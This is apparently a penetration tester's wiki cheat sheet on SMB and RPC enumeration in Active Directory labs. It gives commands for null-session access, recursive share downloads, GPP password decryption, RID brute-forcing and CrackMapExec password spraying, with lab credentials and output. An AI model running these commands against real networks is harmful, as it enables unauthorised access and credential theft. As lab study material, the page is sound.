❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • enum4linux
  • rpcclient
  • smbclient
  • smbmap
  • CrackMapExec smb
  • SID bruteforcing
  • Password bruteforce

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

SMB & RPC Enumeration

enum4linux

enum4linux IP

rpcclient

rpcclient -U '' 10.129.229.11

rpcclient> enumdomusers

hit tab twice

rpcclient> querydispinfo

smbclient

Null session

smbclient //10.129.230.0/support-tools -N
smbclient -L //IP -U '' -P ''

Connect to a share

Connect and download recursively all resources

smbclient //IP/IPC$  

smbclient //10.129.229.121/Replication

smb: \> recurse on
smb: \> prompt off
smb: \> mget *

SMB Null session

smbclient -L //IP -U '' -P ''

smbmap

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.229.121 

Group Polict Preferences (GPP)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ  

CrackMapExec smb

Determine Password Policy

crackmapexec smb 10.129.228.111 --pass-pol
└─# crackmapexec smb 10.129.96.157 -u ./users.txt -p ./passwords.txt 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 

SID bruteforcing

crackmapexec smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute

Password bruteforce

Users / Users

Try out first username combinations as a password

crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

Users / Username (1)

try username as the password (only one attempt per user)

crackmapexec smb 10.10.85.7 -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce 

Users with empty password

try users with empty passwords

└─# crackmapexec smb 10.10.85.7 -u ./users.uniq -p '' --continue-on-success --no-bruteforce 

PreviousWinRMNextSMB Relay

Last updated 1 year ago

Was this helpful?

Enumerate users by bruteforcing RIDCrackMapExec ~ CME WIKI
Logo